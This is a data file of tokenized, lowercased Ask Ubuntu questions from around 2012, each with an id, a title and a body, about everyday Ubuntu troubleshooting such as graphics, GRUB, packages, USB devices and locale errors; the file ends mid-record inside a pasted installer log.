182694	how to install last version of opera without losing opera-unite ?	opera unite is a feature in the opera browser that was abandoned in opera 12 . in windows , keeping opera 11 and installing v12 on top of it , or upgrading , opera-unite stays into the browser . in ubuntu , by installing the v12 deb or by upgrading to v12 after adding it to software sources ( like this ) , opera-unite is lost . is there a way of upgrading to v12 without losing opera unite , like i was able to do in windows ?
182697	ubuntu 12.04 two graphics cards	i have been struggling to get my two graphics cards to work . one is on the board and one is not . i can change the bios on my msi motherboard to `` internal , pci , or pci-e '' . internal of course the one on the board becomes available . if i use pci or pci-e the card is used but the internal just does n't show up at all on the system . with windows installed `` internal '' allows both to work . here is what i get when i do a lspci 01:05.0 vga compatible controller : advanced micro devices [ amd ] nee ati rs780l [ radeon hd 3000 ] 02:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv516 [ radeon x1300/x1550 series ] 02:00.1 display controller : advanced micro devices [ amd ] nee ati rv516 [ radeon x1300 pro ] ( secondary ) i 'm not sure why the external , `` x1300 '' is showing up twice . i have tried to adjust the xorg.conf file which of course is not found initially but i guess i ca n't get it configured correct as it just crashes the os or `` x '' anyway . i have two lg flatron w2061tq monitors . any ideas on how to get both cards working with extended displays ?
182698	flash videos choppy after computer has been on for a day or so	i find that flash videos are extremely choppy ( in firefox ) or are really sped up as if on fast forward ( on chrome ) when my ubuntu 11.10 has been on for more than a day or so . usually restarting the computer helps . my flash version is : 11,2,202,238 is there any process that i can turn off and then turn on instead of rebooting my computer ? i tried this to no avail : youtube movies are playing too fast with chrome
182700	how to make a clickable terminal shortcut on the desktop	i was wondering how to make a clickable terminal shortcut for my desktop using the command easytether connect . i do n't want to have to open/close the terminal every time i wish to connect to the internet through my phone . i 've tried updating my gnome-panel but i can only make a new directory on my desktop .
182703	how and why to create -dbg , -dev , -doc packages ?	i 'm writing an ubuntu package for a package which essentially provides a number of libraries and headers which then be used to build other software . the package also breaks up in smaller subpackages which are interdependent ; in this sense the package is quite similar to boost . i noticed that packages like boost provide [ ... ] libboost-dbg libboost-dev libboost-doc [ ... ] libboost-all-dev [ ... ] but nothing that goes by the name boost or libboost . what is the idea behind this ? what are the purposes of the -dbg , -dev , and -doc packages ? are there any instructions provided on how to write build files for those packages ?
182705	downclock cpu reaching critical temperature	i have an hp tx1250 laptop . it always had serious overheating problems and although usually it runs fine i 'm now running a continuous test for my dissertation , this brings the cpu temp close to the critical and from time to time the computer shutdown for reaching it ( checked the log ) . i use to have the same problem on win xp but i noticed win vista and 7 downclock the cpu when is necessary to cool it down so i was thinking if the same is possible on ubuntu 12 . the only program i 've found that may do the job is computer temp ( http : //computertemp.berlios.de/ ) but it does n't seems to work under ubuntu 12 . the inside of the laptop is fairly clean , the thermal paste is quite recent , i 'm keeping it lifted from the desk and judjung by the sound of the fan that 's running fine as well . the pc in now running between 78 and 91 degrees c but about once a day it shut down for reaching 95 . i need the results of the test it 's running pretty soon so it 's important that it runs non-stop . i 've though to set the maximum clock of the cpu to slightly less the maximum but then these tests i 'm running would take much more time . thanks for your answers but i was thinking about something much easier . actually i was about to do a bash script reading the temp on lm-sensor and adjusting the frequency but i though there was already some software doing this or linux itself should .
182707	how can i change the default alt+f2 search ?	by default , when i press alt+f2 it just tries to autocomplete what i am trying to do with commands . is there a way to have it search installed applications as well ? maybe even recent documents , but i 'll take just applications . is there another shortcut i should be using instead ?
182709	how do i roll back to the shipped version of thunderbird ?	i was using thunderbird v15.0 on ubuntu 12.04 lts till now , and have the lightning extension installed to manage calendar within thunderbird application . everything was working fine until i decided to update thunderbird to the latest version 16.0 from ubuntu repository . installation was successful , and the profile everything was taken care of perfectly , except that now lightning is not working - it is disabled as lightning v1.7 is not compatible with latest thunderbird v16 yet . as a result i am at loss with all my scheduling . now , i would like to go back to thunderbird v15 so that i can use lightning . ubuntu repository only gives tb v16 now . on mozilla site , they are still giving v15 for linux , so i downloaded the tarball and uncompressed using command line . now i have a folder called thunderbird . there are no readme/ configuration files . there are following 'executable files ' inside this folder : crashreporter , mozilla-remote-client , plugin-container , thunderbird and thunderbird-bin . i tried invoking thunderbird and thunderbird-bin from command line using sudo , still nothing is opening up . i have execute permissions for this folder contents . i m quite new to linux . please let me know why i m not able to launch thunderbird . did i install it incorrectly ? please let me know if i can get a .deb package for tb v15 .
182711	how do i reinstall the sound icon / sound menu ?	i was trying to fix a problem a long time ago with my sound by removing alsa/puleaudio and reinstalling things that i did n't understand . now my sound is messed up . the volume keys on my keyboard do n't work , and i do n't get the same sound indicator menu as i used to that had rhythmbox etc in it . also , this happens gnome-volume-control-applet : command not found i 'm very sure this is just a matter of re apt-getting some packages and maybe removing , but i do n't know which . the sound itself does play .
182712	12.04 : having problem with reisub	often my ubuntu freezes up altogether ( only able to move my cursor ) . so i try to reboot using the keys `` alt+prntscrn+reisub '' , but this is what happens > > once i finish hitting the keys re , my screen goes black and it shows up a few lines of commands ( or whatever ) which i dont understand . i have no other choice other than manually force shut down ( by pressing power button for 3-4 seconds ) here is a screenshot of what my black screen displays as soon as i hit r , e what do these lines mean ? is there anyway i can safely restart my pc ? ( since i was unable to use printscreen , i had to manually take a snap of my monitor using my camera . i had taken 3 pictures of the same screen , because i could not capture the entire text displayed on my screen in a single click )
182715	`` make '' and `` make install '' never work	i have been trying it from a long time now and this time it got my nerves ... the commands make and make install used to install a program from an extracted tar ball never work for some reason ... the make command gives me the error- make : *** no targets specified and no makefile found . stop . and the make install command gives me the error make : *** no rule to make target `install ' . stop . why are these commands not executing ? what should i do to solve this issue ?
182716	errors were encountered while processing : linux-image-3.2.0-27-generic linux-image-3.2.0-29-generic linux-image-generic inux-generic	my operating system is ubuntu precise . i tried to implement sudo apt-get install texlive-fonts-extra , then i got error : setting up linux-image-3.2.0-27-generic ( 3.2.0-27.43 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) when i type one enter after another , it appears on the shell : could not chdir to / : no such file or directory at /var/lib/dpkg/info/linux-image-3.2.0-27-generic.postinst line 235` . dpkg : error processing linux-image-3.2.0-27-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up linux-image-3.2.0-29-generic ( 3.2.0-29.46 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) then i took a look at line 235 , it is like this : chdir ( $ cwd ) or die `` could not chdir to $ params { 'new dir ' } : $ ! `` ; cwd is defined in the lines above this line as : chomp ( $ cwd = `pwd` ) ; i can not find a clue why the error occurs . i tried all the stuff provided in the ubuntu forum , like : sudo dpkg -- configure -a sudo apt-get -f install sudo dpkg -- configure initramfs-tools they just do n't work . ( either end up in the same error as illustrated above or e.g.package initramfs-tools is already installed and configured ) i really appreciate it if anyone can give me a hint on this . thank you in advance !
182723	expiry time in notify-send notifications	on my hp computer running ubuntu 12.04 , the brightness and volume increments were much higher than i wanted . on top of that , the notification for the volume was just plain wrong ( 0 % sound did not correspond to 0 on the progress bar ) . so i decided to override these options with my own commands . i used compizconfig settings manager to add custom commands to the brightness and volume keys ( this could n't be done in the regular settings because these keys were handled by the bios , unlike normal function keys ) . i used xbacklight to control the brightness and amixer to control the volume . the problem is that the nice notify-send notifications do n't show up when i manually set the brightness/volume , so now i have to do that myself too . however , there are two problems with notify-send : the expire time option does n't work you have to wait until a notification is finished before the next one comes up before i overrided the brightness/volume keys , the system was able to send notifications without these two restrictions . notifications disappeared within 3 seconds ( instead of the default 10 ) , and if i double tapped the volume or brightness button , the progress bar would immediately change to the new brightness ( instead of showing the old progress bar for 10 seconds and then showing the new one ) . since the system was able to do it , i was wondering how i can achieve the same type of notifications ?
182728	reinstalling mac os on ubuntu imac	so i deleted all os on my imac 1gb ram , 250gb hd and installed ubuntu 14.0.1 onto the system . how would i be able to create a bootable snow leopard usb to reinstall snow leopard . i will probably torrent the dmg but i 'm unsure as how to partition the memory stick and how i would go to create the usb . thanks in advance
182730	keyboard freezes with wireless use on hp pavillion dm1	i recently bought an hp pavillion dm1 laptop for everyday use . to get the wireless card working , i had to install the proprietary broadcom drivers . however , this has created a problem : from time to time , the keyboard and touchpad freeze . the system is not frozen , and whatever was running keeps on running . if i connect an external keyboard/mouse to the system they work fine , and if i run sudo modprobe -r psmouse sudo modprobe psmouse from a terminal , then the laptop 's keyboard and touchpad regain their functionality . if i switch of the wireless , this problem does not happen any more . similar problems have been posted elsewhere , but the solutions given have not worked for me . these normally include blacklisting modules in /etc/modprobe.d/blacklist.conf . any help will be appreciated .
182734	why does cvt change my res value ?	i have problems with my resolution and i wanted to adjust it with the help of xrandr , but when i try to set it up it changes the values.. fabio @ fabio-easynote-ts11hr ~ $ cvt 1366 768 # 1368x768 59.88 hz ( cvt ) hsync : 47.79 khz ; pclk : 85.25 mhz modeline `` 1368x768_60.00 '' 85.25 1368 1440 1576 1784 768 771 781 798 -hsync +vsync so it changes my 1366 in 1368 and when i try xrandr : fabio @ fabio-easynote-ts11hr ~ $ xrandr -- newmode `` 1368x768_60.00 '' 85.25 1368 1440 1576 1784 768 771 781 798 -hsync +vsync xrandr : failed to get size of gamma for output default x error of failed request : badname ( named color or font does not exist ) major opcode of failed request : 149 ( randr ) minor opcode of failed request : 16 ( rrcreatemode ) serial number of failed request : 19 current serial number in output stream : 19 what can i do ?
182739	ubuntu 12.04 uefi partition boot fail	i 've built a new system , and i want to take full advantage of uefi and ubuntu . so i install ubuntu , and try to boot from it , and my bios ( asus ez mode / advanced mode ) simply says `` no bootable medium found . insert bootable medium and press any key to try again . '' so i 've reinstalled several times , without any failures , ubuntu is installed , and i 've tried ubuntu boot repair ( link below ) and nothing i do seems to work . my build : asus f1a75m pro amd a8 apu samsung 1tb hdd 8gb g-skill ripjaws x ( 1866 ) partitions and ubuntu boot repair here
182742	dual screen with just extended desktop	im using a dual monitor set-up a lot , but i have a problem . i need to forbid to clone the dektop , i want to use just the extended desktop feature . can it be done somehow ? it 's a problem because , when is start my system with two monitor it starts automaticaly with cloned desktop . when i use the hotkey to switch beatween monitors the same problem occours . always going to the screen resolution options is pain in the * . i have a intel hd3000 videocard ( sandy bridge ) thanx a lot
182746	can not boot from thumbdrive	i created a bootable thumbdrive following the instructions and changed boot order of my laptop to usb first . my laptop still boots into windows . what am i doing wrong ?
182750	use same dns server for all ( future ) connections	i 'm wondering if it is possible to specify , that all connections ( even future , like when using wifi at some other place ( =different ssid ) ) will be using pre-defined dns server when i have some ( concrete ) connections , i could go to ipv4 settings , and specify dns server there ( however , in case of new connection i would have to do it ( and not forget it ) ) this may be particularly useful for some safe/filtering dns ( such as opendns 's 208.67.222.123 & 208.67.220.123 )
182753	thunderbird inbox conversion	i have installed the thunderbird email client and think that the mails are being stored in the files inbox and inbox.msf . is it possible to convert the inbox and inbox.msf files into individual files ?
182757	missing graphics card driver	when i open `` details '' at dash home , i check what graphic driver my computer is using but it says unknown . is this a bug or anything else ? what should i do ? i'am using ubuntu 12.04
182761	trick ubuntu into resolving a domain name locally	i have an ubuntu box that i use for all sorts of things . one thing i really want to do is redirect a sub domain to a local script . for example thisbit.example.com should actually show the content from localhost/~user/fake.thisbit.example.com/ which is a folder that apache is running for me which contains a very simple php script which implements an offline version of a server script that i am testing against . but example.com should continue to behave normally as should notthisbit.example.com etc . ideally i need to be able to switch from testing to live with minimal fuss when the time comes .
182768	how to create custom sound events ?	is it possible to create custom sound events in unity ? like setting a raindrop sound to be triggered when the dash is open , when you call the launcher , when your mouse hovers over icons in the launcher , when you open/close/minimize/maximize a folder , etc . if it is possible , then what is the easiest way to do it ?
182770	create a hotspot which requires a username and password	i wish to set up a wireless access point which requires a username and password in order for clients to use the internet . the network setup will be internet modem connected to an ubuntu server ( 2 networks cards ) . the first network cards to get the internet to the server and the second network card to connect the the wifi hotspot . the server will host the software such as ( example software for windows ) which will control the user connected by forcing them to login with the credentials given at the reception . can some suggest some software that i can use ? not sure if packetfence is what i need ? if yes do i needs some special hardware ? thanks in advance
182771	how to get lamp offline installer ?	where can i download the latest apache , mysql and php offline installers ( maybe .deb ) ? ( both x64 and x86 , if available ) i 'm currently on windows , and ca n't switch to ubuntu and use apt-get download ( or something like this ) . thanks .
182777	where do i find a site that provides indicator applets like weather indicator ?	i am looking for a site that i can find applets for gnome-panel just like gnome-shell has this extension.gnome.org any idea ?
182785	12.04 lock screen wont change to my wallpaper	i did a fresh installation of ubuntu 12.04.1 , everything is fine but when i go into my lock screen , the background does not change to my background of my desktop . on my other ubuntu 12.04 installation , it took months for that feature to `` activate '' . how do i fix it so that it starts now ?
182789	ubuntu 12.04 black-screen and totally freezes switch user	how to troubleshoot this issue is my question . i do n't know how to go about this . i set up an account for my wife to use the computer for her homework . i log in automatically . she logs in and does her homework . i switch users . the kernel locks up . ctrl+alt+f1-12 do nothing . this happens somewhat randomly but always after i 've selected the user and before . there is somewhat of a random graphical glitch on the screen suggesting it may be due to a video change of some type . i am running dual displays . how do i find out what the problems is ?
182794	how do i partition my hard drive to install kubuntu ?	i am a complete newbie to partitioning and i would like some guidance here . can anyone explain what exactly i should be doing here ? i am installing kubuntu 12.04 on a currently windows 7 laptop . my current partitions say this : /dev/sda /dev/sda1 ntfs 104 mb 35 mb /dev/sda2 ntfs 319965 mb 87164 mb basically , what i want is some guidance on what exactly to do here . all i want is a partition for my os ( which will be kubuntu 12.04 ) and a partition for all of my data . i also want to restart fresh with my hard drive , with only what i mentioned on here . i am installing kubuntu from a flash drive ( i set it up as a bootable device with universal-usb-installer-1.9.0.9 ) , as i do not have any blank cds/dvds to burn to . what should i name my partitions ? what should i set the type as ? what size do they need to be ? edit : my hard drive is 320gb . just looked it up in my bios . this computer will mainly be used for internet browsing and overall just messing around with the linux os .
182799	dual boot problem ! ( grub problem )	i had just finished my setup for dual boot , everything went fine but i lost my ubuntu : zero fill + create 2 windows partitions ( fine ) install windows and configure c : / for the system and d : / for documents ( fine ) create 2 partitions for ubuntu , one for the `` / '' and other for swap ( fine ) reinstall windows on the c : test , if i ever need to do that , failed , now i just have windows on the boot , i lost that option to launch either windows or ubuntu . how do i fix that ? edit : just googled a bit and some people say it 's a grub problem please help me =/
182800	ubuntu 12.04 disk installs lts on desktop ? ? wrong display drivers	i used the same 12.04 install disk to install on two desktop machines . one worked correctly and easily recognized the dell 2210 display . the other loaded an lts ( laptop ? ? ) version that has a display driver that insists it 's on a laptop with all the wrong resolution options . reloaded again and could n't find any way to force loading the desktop version . how do i fix this ?
182804	12.04 indicates filesystem check on next boot , but never does one	just installed 12.04 32 bit on my machine , with 3 drives . when i open a terminal window or ssh in remotely , i see : welcome to ubuntu 12.04.1 lts ( gnu/linux 3.2.0-29-generic-pae i686 ) * documentation : https : //help.ubuntu.com/ *** /dev/sda1 will be checked for errors at next reboot *** *** /dev/sda2 will be checked for errors at next reboot *** *** /dev/sdg1 will be checked for errors at next reboot *** last login : fri aug 31 08:15:41 2012 from ... . however , if i reboot , i never see it doing a disk check on boot up , like i used to see with 10.10 . note , after install , i was not seeing the grub menu on boot . i made a iso disk with bootrepair and now i get the normal grub menu . any idea as to why the disk check is not happening on boot ( i know i can boot a live cd and then check the disk - i just want the check on boot working ) ?
182807	ca n't install skype because of 'ia32-libs-multiarch ' several dependencies	i 'm trying to install skype in 12.04lts . it fails to install from the software center , complains about skype-bin being a virtual package . skype-bin fails to install from apt-get , requires ia32-libs . several online sources pointed to the installation of ia32-libs-multiarch . fair enough . tried to install ia32-libs-multiarch from apt-get . another several dependencies from 32bit packages that are on hold . each package has another 4 , 5 32bit package dependencies on hold . really , this is hell . how can i tell ubuntu to not hold anything , to just install the frigging packages and its dependencies ?
182811	wireless card for ubuntu	bought a new desktop and found myself in need of a wireless card . went to the wiki and found a list of compatible cards , but i have no idea which ones have which functions at what price . can anyone recommend a good card at a good price ?
182815	why will screenshot not show up in dash ?	i 'm relatively new to ubuntu , and am running into a problem i 've not seen before . this is on an ubuntu 12.04 system . i ca n't find screenshot . i 'm trying to take a shot of a screen from a web page , go to dash , type in screenshot , and nothing shows up . i 've done this many times before , but suddenly screenshot is not found . i downloaded an app called shutter , it seems to have installed just fine , but like screenshot , i do n't know how to find it . dash reveals nothing . in dash , i 've noticed that i have no applications showing up in response to a search . for instance , i can type firefox , and get no results either , even though i 'm using firefox to submit this question . is there something i can do to get dash to show applications ? search results show only files and folders , and downloads . i did find one answer on ask ubuntu , which gave the following instructions : none of these fixes worked for me . but after more searching : rm ~/.cache/software-center -r worked like a charm . i did need to run : unity -- reset & afterwards though , for the changes to take effect within dash , but the software center just started working straightaway . however , when i issued the unity -- reset & command , it resulted in an internal error , and i 'll have to reboot in order to reset my computer ( which fortunately is allowing me to complete this question ) . so i 'm still wondering why applications wo n't show in dash , and will appreciate any help .
182817	ubuntu freezing on log in screen	i 'm new to ubuntu and set up dual-boot on my computer and just downloaded it . when i get to the log in screen everything freezes . my keyboard does n't work , i ca n't move my mouse at all . i have been reading around to try the text log in but i ca n't use to the keyboard to access it . what can i do to try to fix it ?
182826	running apt-get update shows gpg error	i am getting below gpg error on running the command sudo apt-get update . w : gpg error : http : //in.archive.ubuntu.com precise release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ precise/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_partner_binary-i386_packages ) also , i am not able to install applications from software center . every time i install it shows a dialog box with the message , requires installation of untrusted packages the action would require the installation of packages from not authenticated sources . ok or repair options does nothing .
182828	when running minecraft with openjdk , my keyboard becomes unresponsive ?	i recently downloaded minecraft with the .jar format and had it running on my computer not so long ago . now that i 'm using my desktop instead of laptop temporarily , i want it to run . on my laptop it was a tremendous hassle to get openjdk to even run the application without it going black and i do n't have that problem on my desktop . however , when i run the application on desktop , my keyboard becomes unresponsive and does n't type at all . this is a really big problem because i ca n't play the game as it requires keyboard interaction . it works as normal on my laptop though and it works perfectly . but now on the desktop it 's completely useless . i do n't know if there 's like a keyboard driver i 'm missing , but there should n't be because the keyboard runs flawlessly everywhere else . i 'm using openjdk 6 because the 7 has the same 'black screen ' i mentioned . so i need this to work within openjdk 6 . thanks so much in advance and i 'll try to specify as many details as i can .
182829	problems after upgrading from 10.04 to 12.04	i upgraded to 12.04.1 from 10.04 recently and am running the gnome classic ( no effects ) desktop . i spent a couple of days tweaking the appearance and behaviour but there are two issues that i ca n't resolve . the mouse cursor frequently disappears , especially when scrolling through web pages or hovering over links/icons with tooltips . moving the mouse brings the pointer back but it vanishes again almost immediately . note i do n't have unclutter or parallels installed . the screen no longer fades to black when left idle for too long - it just cuts out . bad news when watching content online . edit : it 's a 2 year-old acer aspire one laptop with 2x intel atom z520 processors @ 1.33ghz , 1gb ram , intel gma500 poulsbo graphics card . i originally installed 10.04 via wubi and upgraded to 12.04 via update manager . any tips greatly appreciated . cheers ...
182830	5.1 subwoofer and front center audio swapped ( 12.04 )	well , as the title says , my subwoofer and central audio are swapped . i tried , as a post said , to manually modify the audio channels in /usr/share/pulseaudio/alsa-mixer/profile-sets/default.conf . i made a sound test , but subwoofer played center 's audio and viceversa . please help . my sound card is a creative sb live ! 5.1 pci .
182834	how can i get 32-bit program to run on 64-bit ubuntu ?	sorry to be asking this , but i have read quite a few posts and articles a lot of places wrt the issue i am having , to no avail . i am trying to get a second life viewer ( firestorm ) to run , and just keep getting the '64-bit error message ' it throws . i have installed every 32-lib i can find , still does n't work . i think i am surely missing some setting somewhere , or running firestorm from the wrong place , or something , but i have no idea what . fwiw , firestorm loads but does n't behave right in the 32-bit version , either . i have actually tried several linux distros , 32 and 64-bit . mint 32-bit runs it straight off , and mint 64-bit throws the '64-bit error ' . opensuse , any version , wo n't run it at all . oh , and all the other sl viewers i have tried behave the same way . i am beginning to wonder if my set-up just does n't like linux . here is my system info : cpu : intel ( r ) core ( tm ) i5 cpu 750 @ 2.67ghz ( 2661 mhz ) memory : 4026 mb os version : linux 3.2.0-29-generic-pae # 46-ubuntu smp i686 graphics card vendor : ati technologies inc. graphics card : ati radeon hd 5700 series i appreciate any help anyone can give me !
182836	how to change dnsmasq port ?	i am using port 53 for my vpn , and i need to use port 53 . i changed the port of dnsmasq , connected openvpn , and now request are unable to resolve errors . sudo dnsmasq -p 5642 . is there a way to change the port of dnsmasq w/o conflicts/errors ?
182838	how can i modify grub ?	how can i make it so my grub does not show safe modes , does show memory sticks , and if possible has a hotkey to boot windows ?
182839	my administrator password does n't work	i have recently loaded ubuntu from a cd . my administrator password does n't work when logging into ubuntu at the opening screen .
182848	stackapplet redirect me to `` page not found '' page ?	when i click on one of my accounts in stackapplet on ubuntu 12.04 , it redirects me to a page that says `` page not found '' . the redirected page is http : //askubuntu.com/users/recent/78740 but i guess it should redirect me to http : //askubuntu.com/users/78740/saeed-zarinfam . i use stackapplet-1.4.0-2 . has anyone had this problem ?
182849	how do i format or partition a read-only usb drive ?	whenever i try formatting my sandisk cruzer glide 16gb , i get this error message on gparted . gparted 0.11.0 -- enable-libparted-dmraid libparted 2.3 create primary partition # 1 ( ntfs , 14.42 gib ) on /dev/sdc 00:00:00 ( error ) create empty partition 00:00:00 ( error ) libparted messages ( info ) unable to open /dev/sdc read-write ( read-only file system ) . /dev/sdc has been opened read-only . unable to open /dev/sdc read-write ( read-only file system ) . /dev/sdc has been opened read-only . unable to open /dev/sdc read-write ( read-only file system ) . /dev/sdc has been opened read-only . ca n't write to /dev/sdc , because it is opened read-only . unable to open /dev/sdc read-write ( read-only file system ) . /dev/sdc has been opened read-only . ======================================== how do i disable / delete the read only filesystem ? is my usb corrupted ?
182851	how can i remove or block every method that can be used to reset my password ?	i 've been an ubuntu user for a while now and not so long ago one of my computers got hijacked and malicious code was installed in it by simply replacing my password using the various password recovery features in the os . please help me . your assistance will be greatly appreciated .
182852	`` iso-mount seems to be mounted read-only '' error in uck 2.4.6 or 2.2.0	i need to use uck on 12.04 . if i use any version of uck 2.4.6 or uck 2.2.0 , i am getting an error iso-mount seems to be mounted read-only . can some one help to quickly sort this error ? i need to use uck on lubuntu or ubuntu 12.04 urgently .
182855	no boot selection screen	i recently installed ubuntu 12.04 lts alongside windows 7 using ubuntu 's startup disk creator and installation completed without any difficulties or errors . now when i try to boot , it directly boots with windows and shows no option to choice as to which operating system to load . but when i boot using that same pen drive with which i installed ubuntu , it shows an os selection screen . i also tried the command sudo gedit /etc/default/grub & sudo update-grub and i see `` found windows 7 ( loader ) on /dev/sda2 '' and `` found windows 7 ( loader ) on /dev/sda3 '' messages while running the later command , but still the same problem persists . what should i do in order to get the os selection screen . please help me .
182861	no option of logging into ubuntu	one of my friend uses both ubuntu and windows7 . recently he switched to windows 8 ( release preview ) . but now when he boots his system he does not get option of using ubuntu as his os that is , he is automatically logged into windows . is it some minor issue which will be fixed up in the stable release of windows 8 and so should not bother him or does he need to change some configurations in his system . ps : i will also soon upgrade my windows 7 to 8 though i hardly use it . so i do n't want to face the same issue .
182865	command line method to find disk usage of camera mounted using gvfs	when my camera was mounted on /media i could use the standard tools ( df ) to see the disk usage of the card in my camera . however now the camera is mounted using gvfs , and df seems to ignore it . i 've also tried pydf and discus to no avail . the camera is definitely available through nautilus , and when i select the camera in nautlius , the status bar tells me the amount of disk free . i can also open the ~/.gvfs/ folder in nautilus and right click on the camera folder and get the disk usage in a graphical way . but that is no use for a script . are there command line tools that are the equivalent of df for gvfs filesystems ? or even better , a way to make df report on gvfs filesystems ?
182867	what are the best recovery softwares for ubuntu 12.04 ?	what are the best recovery softwares for ubuntu 12.04 ? is there some of them that has a gui ? what are the softwares that work with other file systems like fat.ntfs , hfs , ... etc i need tools working on ubuntu to recover my lost/deleted files
182869	bluetooth is not working in ubuntu 12.04	i am using sony vaio laptop and i have installed 12.04 . my bluetooth is not working . neither it can search any device nor the opposite . i generally use bluetooth modem ( mobile phone ) for internet in home but unable to do this . please help me to solve the problem . i have seen many posts regarding this problem and tried all possible solutions but those could not solve the problem .
182874	automatically starting crashplan backup when a usb harddisc is connected	using crashplan i 've configured two backup sets : online backup in crashplan 's cloud ( this is running perfectly ) a local backup on a usb harddisc directly connected to the local laptop . the usb drive is only connected rarly when being at home . when connecting the drive it mounts automatically . is there a way to start the local backup whenever the usb disc connected . my guess is that using udev it should be possible to `` somehow '' tell crashplan to reevaluate the presence of backup location . any ideas to do this ?
182875	usb ports in wrong mode , how to use usbmodeswitch ?	i have n't had access to my usb ports as media devices for a couple days now . i 've been reading and researching everything i can find but i ca n't find a good guide for usbmodeswtich or usbms that i can decipher . the usb 's are fine for power , but wo n't support my android phone as a media device , which is killing me because i use adb everyday , and wo n't support my plug and play mouse any longer . not sure what caused the switch , though i think it may be related to the suspend issue i 've read about , but the solutions in those threads i read also did n't work . below is my system information and details . system : ubuntu 12.04 , 64-bit , dedicated machine machine : hp-pavillion g6 notebook , amd a6 quad core processor usbs used for : cooling dock , android debug bridge , wireless mouse attempted mod probe , udev restart , unable to attempt lsusb due to my own lack of knowledge . : ) last attempt readout : ncandiano @ ncandiano-hp-pavilion-g6-notebook-pc : ~ $ sudo modprobe -r usbhid & & sleep 5 & & sudo modprobe usbhid ncandiano @ ncandiano-hp-pavilion-g6-notebook-pc : ~ $ sudo modprobe -r usb-storage ncandiano @ ncandiano-hp-pavilion-g6-notebook-pc : ~ $ sudo modprobe usb-storage ncandiano @ ncandiano-hp-pavilion-g6-notebook-pc : ~ $ sudo restart udev udev start/running , process 2624 ncandiano @ ncandiano-hp-pavilion-g6-notebook-pc : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 0461:4de7 primax electronics , ltd webcam any help would be greatly appreciated !
182879	how to access parent window in dialog	i am using quickly and created the main window and a dialog . in the main window i am setting access to database ( u1db ) in the finish_initializing method ( self.db= ... ) . after an action i open a dialog where i need access to the database . i thought that i can use self.get_parent ( ) in the dialog to get instance of the main window and access the database , but return value of the get_parent ( ) is none . my question is , how can i access the instance of the parent window in the dialog or perhaps where should i place the instance of the database wrapper ? shortened code : # guitestwindow.py class guitestwindow ( window ) : def finish_initializing ( self , builder ) : ... self.db = u1db.open ( db_path , create=true ) def on_addaccountbutton_clicked ( self , widget ) : dialog = newaccountdialog.newaccountdialog ( db=self.db ) result = dialog.run ( ) dialog.hide ( ) # newaccountdialog.py class newaccountdialog ( gtk.dialog ) : __gtype_name__ = `` newaccountdialog '' def __new__ ( cls , *args , **kwargs ) : print `` __new__ : % s : % s '' % ( args , kwargs ) builder = get_builder ( 'newaccountdialog ' ) new_object = builder.get_object ( 'new_account_dialog ' ) new_object.finish_initializing ( builder ) print `` __new__ end '' return new_object def __init__ ( self , *args , **kwargs ) : print `` __init__ : % s : % s '' % ( args , kwargs ) self.db = kwargs.get ( 'db ' ) super ( newaccountdialog , self ) .__init__ ( *args , **kwargs ) print `` __init__ end '' result : __new__ : ( ) : { 'db ' : < u1db.backends.sqlite_backend.sqlitepartialexpanddatabase object at 0x1884f50 > } __init__ : ( ) : { } __init__ end __new__ end __init__ : ( ) : { 'db ' : < u1db.backends.sqlite_backend.sqlitepartialexpanddatabase object at 0x1884f50 > } __init__ end
182880	error while installation of chmsee	i have recently migrated from windows to ubuntu . my current locale shows below output : cha @ computer : ~ $ locale lang=en_in language=en_in : en lc_ctype= '' en_in '' lc_numeric= '' en_in '' lc_time= '' en_in '' lc_collate= '' en_in '' lc_monetary= '' en_in '' lc_messages= '' en_in '' lc_paper= '' en_in '' lc_name= '' en_in '' lc_address= '' en_in '' lc_telephone= '' en_in '' lc_measurement= '' en_in '' lc_identification= '' en_in '' lc_all= when i am trying to install chmsee ( or any other application ) using software center , i am getting below error . installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory selecting previously unselected package libchm1 . ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 207053 files and directories currently installed . ) unpacking libchm1 ( from ... /libchm1_2 % 3a0.40a-1_i386.deb ) ... selecting previously unselected package libjavascriptcoregtk-1.0-0 . unpacking 